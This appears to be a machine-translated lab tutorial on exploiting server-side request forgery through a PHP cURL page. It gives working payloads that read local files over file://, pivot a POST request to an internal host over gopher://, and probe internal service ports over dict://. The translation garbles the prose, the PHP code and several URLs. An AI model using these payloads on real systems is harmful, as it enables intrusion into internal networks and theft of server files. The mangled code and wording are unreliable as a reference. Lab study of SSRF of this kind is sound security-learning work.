0x01 Overview
The first part describes the general usage of SSRF, to use http network detection, network within striking redis, the following discussion is to expand the usage of SSRF through, file, dict, gopher protocol to use SSRF vulnerability.
0x02 experimental environment
Attacker: 192.168.220.140
SSRF vulnerability exists drone: 192.168.220.143
Attack within the network ip: 192.168.220.144
SSRF vulnerability exists in the page: http: //192.168.220.143: 8888 / zhan / ssrf / ssrf_demo.php, code is as follows:
? < PHP // create a new cURL resource $ CH = curl_init (); // set URL and the appropriate option curl_setopt ( $ CH , CURLOPT_URL, $ _GET [ 'url' ]); curl_setopt ( $ CH , CURLOPT_HEADER, false ) ; // grab URL and pass it to the browser curl_exec ( $ CH ); // close cURL resource, and free up system resources curl_close ( $ CH ); ?>
[1] by using the file protocol to read the file
Visit: http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=file:///C:/WINDOWS/win.ini, successfully read the file
[2] to use the intranet system by POST attack gopher protocol
Suppose there is a network system (http://192.168.220.144/bWAPP/post.php), which support the POST request, as follows:
<html> <head> <title>post</title> </head> <body> <?php echo $_REQUEST[cmd]; ?> </body> </html>
By curl command [] and [] gopher protocol can initiate a request for a post http://192.168.220.144/bWAPP/post.php, for example, directly execute the following command:
curl 'gopher://192.168.220.144:80/_POST%20/bWAPP/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.144%250d%250aUser-Agent:%20curl/7.21.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=aaaaaaaa'
View 192.168.220.144 system log will find more than a record of the request from POST 192.168.220.142
By SSRF gopher protocol vulnerability can also use the intranet system POST request, but first need to look at [phpinfo] to confirm curl is enabled, curl version 7.38.0 here is, (7.21.0 begin with, there is no reproduction success, here's a pit! - If the version is too low, increase phpstudy in the php version can provoke ^^ linux, then updates directly under)
Then you can access through URL:
http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=gopher://192.168.220.144:80/_POST%20/bWAPP/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.144%250d%250aUser-Agent:%20curl/7.21.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=qqq
192.168.220.144 go see the system log will find more than a POST 192.168.220.143 request from the record:
Ethereal can be seen through, in fact, 192.168.220.143 did send a POST request to 192.168.220.144, where 143 actually acted as a springboard machine.
Attack process is as follows:
[3] read using the service version running on the target server port information through the dict protocol
Visit: http: //192.168.220.143:? 8888 / zhan / ssrf / ssrf_demo.php url = dict: //192.168.220.143: 3306
Or visit, http: //192.168.220.143:? 8888 / zhan / ssrf / ssrf_demo.php url = dict: //192.168.220.144: 80